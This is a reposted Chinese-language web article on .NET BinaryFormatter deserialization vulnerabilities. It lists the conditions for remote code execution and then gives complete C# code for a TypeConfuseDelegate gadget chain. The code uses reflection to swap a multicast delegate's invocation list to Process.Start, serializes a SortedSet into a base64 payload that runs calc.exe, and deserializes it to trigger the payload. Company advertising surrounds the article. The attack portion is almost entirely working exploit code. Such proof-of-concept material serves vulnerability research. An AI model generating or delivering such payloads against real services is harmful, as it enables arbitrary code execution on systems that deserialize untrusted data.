.Net反序列化漏洞之BinaryFormatter

https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html

目前創(chuàng)新互聯(lián)公司已為上1000家的企業(yè)提供了網(wǎng)站建設、域名、虛擬空間、網(wǎng)站改版維護、企業(yè)網(wǎng)站設計、匯川網(wǎng)站維護等服務,公司將堅持客戶導向、應用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

.Net反序列化導致RCE的樣例,有兩點限制:

  1. BinaryFormatter::Deserialize反序列化的內(nèi)容用戶可控
  2. .Net SDK大于等于4.5
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading.Tasks;

namespace Deserializer
{
    class Program
    {
        public static void getCalcPayload()
        {
            // Create a simple multicast delegate
            Delegate d = new Comparison<string>(String.Compare);
            Comparison<string> d2 = (Comparison<string>)MulticastDelegate.Combine(d, d);

            // Create set with original comparer
            IComparer<string> comp = Comparer<string>.Create(d2);
            SortedSet<string> set = new SortedSet<string>(comp);

            set.Add("calc");
            set.Add("adummy");

            TypeConfuseDelegate(d2);

            BinaryFormatter formatter = new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            };

            using (MemoryStream stream = new MemoryStream())
            {
                formatter.Serialize(stream, set);
                int position = (int)stream.Position;
                byte[] array = stream.GetBuffer();

                Array.Resize<byte>(ref array, position);

                String payload = Convert.ToBase64String(array);
                Console.WriteLine("Calc.exe PayLoad:" + payload);

                //FileSystemUtils.Pullfile(payload, "payload_calc.dat");

                stream.Position = 0;
                formatter.Deserialize(stream);
            }
        }

        static void TypeConfuseDelegate(Comparison<string> comp)
        {
            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
                                    System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);

            object[] invoke_list = comp.GetInvocationList();

            // Modify the invocation list to add Process::Start(string, string)
            invoke_list[1] = new Func<string, string, Process>(Process.Start);
            fi.SetValue(comp, invoke_list);

        }

        static void Main(string[] args)
        {
            getCalcPayload();
        }
    }

}

.Net反序列化漏洞之BinaryFormatter

分享標題:.Net反序列化漏洞之BinaryFormatter
文章URL:http://muchs.cn/article24/gesdje.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站導航、關鍵詞優(yōu)化、App設計品牌網(wǎng)站建設、Google云服務器

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)頁設計公司